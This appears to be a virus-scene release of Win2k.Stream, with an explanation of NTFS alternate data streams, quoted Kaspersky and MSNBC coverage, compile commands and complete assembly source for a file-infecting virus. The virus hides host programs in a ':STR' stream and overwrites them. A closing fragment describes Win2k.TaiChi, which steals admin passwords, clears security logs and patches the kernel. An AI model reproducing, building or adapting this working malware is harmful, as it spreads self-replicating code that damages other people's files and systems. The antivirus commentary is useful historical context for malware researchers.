ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A and Ratter ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Let us introduce very small and simple infector presenting how to use features
of NTFS in viruses. This virus loox like standard Petite-compressed PE file.
However, it presents the newest way of PE file infecting method.
How the virus worx? It uses streamz, the newest feature of NTFS filesystem
and file compression, already implemented in old NTFS fs.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Basic principles of NTFS streamz ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
How the file loox? Ya know that the file contains exactly the same what you can
see when you will open it (e.g. in WinCommander). NTFS, implemented by
Windows 2000, has new feature - the file can be divided to streamz. The content
what you can see when you will open the file is called Primary stream - usually
files haven't more than one stream. However, you can create NEW stream ( = new
content) in already existing file without overwritting the content.
Example:
addressing of primary stream -> <filename> e.g. "calc.exe"
addressing of other streamz -> <filename>:<stream name> e.g. "calc.exe:stream"
If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and
then create new file "calc.exe:stream" and write there "blahblah". Open
"calc.exe". Whats there? Calculator ofcoz. Now open "calc.exe:stream". Whats
there? "blahblah", the new file in the old one :)
Can you imagine how useful r streamz for virus coding?
The virus infects file by moving the old content to the new stream and replacing
the primary stream with virus code.
File (calc.exe) before infection:
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (visible part)Ä¿º
º³ Calculator ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
File (calc.exe) after infection:
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º
º³ Virus ³³ Calculator ³ º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Simple and efficent, ain't it?
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Details of virus ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
* The virus infects all EXE files in actual directory.
* The virus uses as already-infected mark file compression. All infected
files are compressed by NTFS and virus then does not infect already
compressed files. Well, almost all files after infection r smaller than
before, so user won't recognize virus by checking free disk space :)
* If user will copy the infected file to non-NTFS partition (in this case
only primary stream is copied), the host program will be destroyed and
instead of running host program virus will show message box. That can
be also called as payload :P
* The virus is very small, exactly 3628 bytes, becoz it's compressed by
Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).
* The disinfection is very easy - just copy the content of <file>:STR to
<file> and delete <file>:STR. If you want to create sample of infected
file, then just copy the virus to some file and copy any program (host
program) to <file>:STR. Thats all! However, AVerz have to rebuild their
search engine to remove this virus, becoz until now, they had no fucking
idea what are streamz :)
* This virus was coded in Czech Republic by Benny/29A and Ratter, on our
common VX meeting at Ratter's city... we just coded it to show that
Windows 2000 is just another OS designed for viruses... it really is :)
* We would like to thank GriYo for pointing us to NTFS new features.
The fame is also yourz, friend!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ In the media ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
AVP's description:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the first known Windows virus using the "stream companion" infection
method. That method is based on an NTFS feature that allows to create multiple
data streams associated with a file.
*NTFS Streams*
---------------
Each file contains at least one default data stream that is accessed just by
the file name. Each file may also contain additional stream(s) that can be
accessed by their personal names (filename:streamname).
The default file stream is the file body itself (in pre-NTFS terms). For
instance, when an EXE file is executed the program is read from the default
file stream; when a document is opened, its content is also read from the
default stream.
Additional file streams may contain any data. The streams cannot be accessed or
modified without reference to the file. When the file is deleted, its streams
are deleted as well; if the file is renamed, the streams follow its new name.
In the Windows package there is no standard tool to view/edit file streams. To
"manually" view file streams you need to use special utilities, for instance
the FAR utility with the file steams support plug-in (Ctrl-PgDn displays file
streams for selected file).
*Virus Details*
----------------
The virus itself is a Windows application (PE EXE file) compressed using the
Petite PE EXE file compressor and is about 4K in size. When run it infects all
EXE files in the current directory and then returns control to the host file.
If any error occurs, the virus displays the message:
Win2k.Stream by Benny/29A & Ratter
This cell has been infected by [Win2k.Stream] virus!
While infecting a file the virus creates a new stream associated with the victim
file. That stream has the name "STR", i.e. the complete stream name is
"FileName:STR". The virus then moves the victim file body to the STR stream
(default stream, see above) and then overwrites the victim file body (default
stream) with its (virus) code.
As a result, when an infected file is executed Windows reads the default stream
(which is overwritten by virus code) and executes it. Also, Windows reports the
same file size for all infected files - that is the virus length.
To release control to the host program the virus just creates a new process by
accessing the original file program using the name "FileName:STR".
That infection method should work on any NTFS system, but the virus checks the
system version and runs only under Win2000.
AVP's press release:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
*A New Generation of Windows 2000 Viruses is Streaming Towards PC Users*
------------------------------------------------------------------------
Moscow, Russia, September 4, 2000 Kaspersky Lab announces the discovery of
W2K.Stream virus, which represents a new generation of malicious programs for
Windows 2000. This virus uses a new breakthrough technology based on the
"Stream Companion" method for self-embedding into the NTFS file system.
The virus originates from the Czech Republic and was created at the end of
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
Kaspersky Lab has not registered any infections resulting from this virus;
however, its working capacity and ability for existence "in-the-wild" are
unchallenged.
"Certainly, this virus begins a new era in computer virus creation," said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The Stream
Companion technology the virus uses to plant itself into files makes its
detection and disinfection extremely difficult to complete.
Unlike previously known methods of file infection (adding the virus body at
beginning, ending or any other part of a host file), the "Stream" virus
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
data stream the program code itself. Windows NT/2000 (NTFS) enables users
to create any number of data streams within the file: independent executable
program modules, as well as various service streams (file access rights,
encryption data, processing time etc.). This makes NTFS files very flexible,
allowing for the creation of user-defined data streams aimed at completing
specific tasks.
"Stream" is the first known virus that uses the feature of creating multiple
data streams for infecting files of the NTFS file system (see picture 1). To
complete this, the virus creates an additional data stream named "STR" and
moves the original content of the host program there. Then, it replaces the
main data stream with the virus code. As a result, when the infected program
is run, the virus takes control, completes the replicating procedure and then
passes control to the host program.
*"Stream" file infection procedure*
------------------------------------
File before infection File after infection
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
"By default, anti-virus programs check only the main data stream. There will be
no problems protecting users from this particular virus," Eugene Kaspersky
continues. "However, the viruses can move to additional data streams. In this
case, many anti-virus products will become obsolete, and their vendors will be
forced to urgently redesign their anti-virus engines."
In MSNBC's news:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
*New trick can hide computer viruses*
*But experts question danger posed by Stream technology*
-----------------------------------------------------------
Sept. 6 A new kind of computer virus has been released, but security experts
are in disagreement over just how menacing it is. The virus demonstrates a
technique that future writers can use to hide their malicious software from
most current antivirus scanners. But some antivirus companies are playing down
the threat.
THE VIRUS, CALLED W2K.STREAM, poses little threat it was written as a
relatively benign proof of concept. But, according to a source who requested
anonymity, it was posted on several virus writer Web sites over Labor Day
weekend making copycats possible.
The virus takes advantage of a little-used feature included in Windows 2000 and
older Windows NT systems that allows programs to be split into pieces called
streams. Generally, the body of a program resides in the main stream. But other
streams can be created to store information related to whats in the main
stream. Joel Scambray, author of Hacking Exposed, described these additional
streams as Post-it notes attached to the main file.
The problem is that antivirus programs only examine the main stream. W2K.Stream
demonstrates a programmers ability to create an additional stream and hide
malicious code there.
Certainly, this virus begins a new era in computer virus creation, said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
release. The Stream Companion technology the virus uses to plant itself into
files makes its detection and disinfection extremely difficult to complete.
*THIS BUG ISNT DANGEROUS*
---------------------------
No W2K.stream infections have been reported, and experts dont believe the
virus is in the wild circulating on the Internet yet. At any rate, this
virus actually makes things easy for antivirus companies. If a user is
infected, the program creates an alternate stream and places the legitimate
file in this alternate location; the virus replaces it as the main stream. That
makes detection by current antivirus products easy. But future viruses could
do just the opposite, evading current antivirus products.
One antivirus researcher who requested anonymity called release of the bug
somewhat akin to the first macro virus. He added that reengineering antivirus
software to scan for multiple streams would be a complicated effort.
In this case, many anti-virus products will become obsolete, and their vendors
will be forced to urgently redesign their anti-virus engines, Kaspersky said.
*AN OLD ISSUE*
---------------
There is nothing new about the potential of exploiting the multiple stream
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
described it even more explicitly in a 1998 Infoworld.com article.
The SANS Institute, a group of security researchers, issued an alert
criticizing antivirus companies for not updating their products to scan the
contents of any file stream earlier.
We found that the scanners were incapable of identifying viruses stored within
an alternate data stream, the report said. For example if you create the file
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
the alternate data stream file, none of the tested virus scanners were capable
of finding the virus during a complete disk scan.
But some antivirus companies described the threat as minimal because the
alternate stream trick only hides the bug while its stored on a victims
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
said for the virus to actually run, it has to come out of hiding and load into
main memory.
It would be detected as it tried to activate, Palomaki said. But this
signifies importance of real-time protection. He added the virus would still
have to find its way onto a victims computer; and that victim would have to
be tricked into installing the virus using one of the traditional methods,
such as clicking on an infected e-mail attachment.
It could increase the ability to for scanners to miss something, said Pat
Nolan, virus researcher at McAfee Corp. But were on top of it. If there is
a vulnerability, it will be short-lived.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ How to compile it? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).
tasm32 /ml /m9 /q stream
tlink32 -Tpe -c -x -aa stream,,,import32
pewrsec stream.exe
petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe
And here comes the virus source...
#
.586p
.model flat,stdcall
include win32api.inc ;include filez
include useful.inc
extrn ExitProcess:PROC ;used APIz
extrn VirtualFree:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn WinExec:PROC
extrn GetCommandLineA:PROC
extrn GetModuleFileNameA:PROC
extrn DeleteFileA:PROC
extrn ReadFile:PROC
extrn CopyFileA:PROC
extrn WriteFile:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn MessageBoxA:PROC
extrn GetFileSize:PROC
extrn VirtualAlloc:PROC
extrn DeviceIoControl:PROC
extrn GetFileAttributesA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn GetVersion:PROC
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
;compression flag
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
@pushvar macro variable, empty ;macro for pushing variablez
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
.data
extExe db '*.exe',0 ;search mask
fHandle dd ? ;file search handle
file_name db MAX_PATH dup(?) ;actual program name
db MAX_PATH dup(?)
file_name2 db MAX_PATH dup(?) ;temprorary file
db 4 dup (?)
WFD WIN32_FIND_DATA ? ;win32 find data
proc_info PROCESS_INFORMATION <> ;used by CreateProcessA
startup_info STARTUPINFO <> ;...
.code
Start: ;start of virus
call GetVersion ;get OS version
cmp al,5 ;5 = Win2000
jnz msgBox ;quit if not Win2000
mov edi,offset file_name
push MAX_PATH
push edi
push 0
call GetModuleFileNameA ;get path+filename of actual
;program
push offset WFD
push offset extExe
call FindFirstFileA ;find first file to infect
test eax,eax
jz end_host
mov [fHandle],eax ;save handle
search_loop:
call infect ;try to infect file
push offset WFD
push dword ptr [fHandle]
call FindNextFileA ;try to find next file
test eax,eax
jne search_loop ;and infect it
push dword ptr [fHandle]
call FindClose ;close file search handle
end_host:
mov esi,offset file_name ;get our filename
push esi
@endsz
dec esi
mov edi,esi
mov eax,"RTS:" ;append there :"STR" stream
stosd ;name
pop esi
call GetCommandLineA ;get command line
xchg eax,edi ;to EDI
;esi - app name
;edi - cmd line
xor eax,eax
push offset proc_info
push offset startup_info
push eax
push eax
push eax
push eax
push eax
push eax
push edi
push esi
call CreateProcessA ;jump to host code
xchg eax,ecx
jecxz msgBox ;if error, show message box
end_app:
push 0
call ExitProcess ;exit
msgBox: push 1000h ;show some lame msg box :)
@pushsz "Win2k.Stream by Benny/29A & Ratter" ;copyleft :]
@pushsz "This cell has been infected by [Win2k.Stream] virus!"
push 0 ;with name of virus and authorz
call MessageBoxA
jmp end_app
infect: push offset [WFD.WFD_szFileName]
call GetFileAttributesA ;check if the file is NTFS
test eax,800h ;compressed = already infected
jz next_infect
ret ;quit then
next_infect:
push offset [WFD.WFD_szFileName]
mov byte ptr [flagz],OPEN_EXISTING
call Create_File ;open found program
jz infect_end
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
push ebx
call CloseHandle ;close file handle
mov esi,offset file_name2
push esi
push 0
@pushsz "str"
@pushsz "."
call GetTempFileNameA ;create name for temp file
test eax,eax
jz infect_end
mov edi,offset [WFD.WFD_szFileName]
push 0
push esi
push edi
call CopyFileA ;copy there victim program
test eax,eax
jz infect_end
push 0
push edi
push offset file_name
call CopyFileA ;copy ourself to victim program
push esi
mov esi,edi
@endsz
xchg esi,edi
dec edi
mov eax,"RTS:" ;append :"STR" stream to
stosd ;victim program filename
xor al,al
stosb
call Create_File ;open victim file
jz infect_end
push 0
push ebx
call GetFileSize ;get its size
xchg eax,edi
push PAGE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push edi
push 0
call VirtualAlloc ;allocate enough memory
test eax,eax ;for file content
jz infect_end_handle
xchg eax,esi
xor eax,eax
push eax
@pushvar <file_size dd ?>
push edi
push esi
push ebx
call ReadFile ;read file content to
test eax,eax ;allocated memory
jz infect_end_handle
push ebx
call CloseHandle ;close its file handle
push offset file_name2
call DeleteFileA ;delete temporary file
mov byte ptr [flagz],CREATE_ALWAYS
push offset [WFD.WFD_szFileName]
call Create_File ;open stream
jz infect_end_dealloc
push 0
mov ecx,offset file_size
push ecx
push dword ptr [ecx]
push esi
push ebx
call WriteFile ;write there victim program
test eax,eax
jz infect_end_handle
infect_end_handle:
push ebx
call CloseHandle ;close its file handle
infect_end_dealloc:
push MEM_DECOMMIT
push dword ptr [file_size]
push esi
call VirtualFree ;free allocated memory
push MEM_RELEASE
push 0
push esi
call VirtualFree ;release reserved part of mem
infect_end:
ret
; [esp+4] - file_name
Create_File: ;proc for opening file
xor eax,eax
push eax
push eax
db 6ah
flagz db OPEN_EXISTING ;variable file open flag
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp+1ch]
call CreateFileA ;open file
xchg eax,ebx ;handle to EBX
inc ebx ;is EBX -1?
lahf ;store flags
dec ebx ;correct EBX
sahf ;restore flags
retn 4 ;quit from proc
end Start ;end of virus
LegacyWindows/Win2k/Win2k.TaiChi.asm
+31
View File
@@ -0,0 +1,31 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Description.TXT]ÄÄÄ
Win2k.TaiChi by Ratter/29A release #1
This virus has some special features which I would like to list here:
- getting kenel base from PEB
- infecting winlogon via which it disables SFP, captures admins
passwords and later uses them when logged in as normal user to
impersonate admin and working under admin privileges
- once runned as admin adds needed privileges to Everyone
- disables auditing, clears security event log
- uses its own routines for infecting PE exe files on NTFS volumes
(ie it accesses NTFS structures to locate and access the file,
bypassing security and via this you can even modify files that are
normally unmodifiable)
- for this it uses emulation of memory mapped files using SEH
- because a proof of concept virus it infects one file in directory
- everything prepared for using procedure encryption and running length
encryption using SEH (routine seh_decode) however not used in this version
- it has a payload: installs own bootvid.dll which disables security (via
SeAccessCheck patching) via patching the NT kernel runtime and displays
29A logo while booting Windows
Todo:
- emulation engine
- add procedure encryption and running line encryption
- more heavily testing under WinXP and possibly adapting
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Description.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Editor]ÄÄÄ
Due the complexity of the source, it has been placed in Binaries folder.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Editor]ÄÄÄ